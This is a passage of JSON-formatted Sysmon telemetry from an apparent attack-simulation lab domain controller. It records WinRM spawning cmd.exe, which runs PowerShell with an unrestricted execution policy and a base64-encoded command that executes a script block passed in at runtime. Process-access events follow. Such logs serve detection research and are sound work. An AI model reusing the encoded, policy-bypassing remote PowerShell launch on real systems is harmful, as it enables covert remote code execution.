QQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nParentProcessId: 3140\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.027","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","ParentProcessId":"3140","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00108D0B0800}\r\nSourceProcessId: 3140\r\nSourceThreadId: 4368\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00108D0B0800}","SourceProcessId":"3140","SourceThreadId":"4368","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010550E0800}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010550E0800}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.025\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.025","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\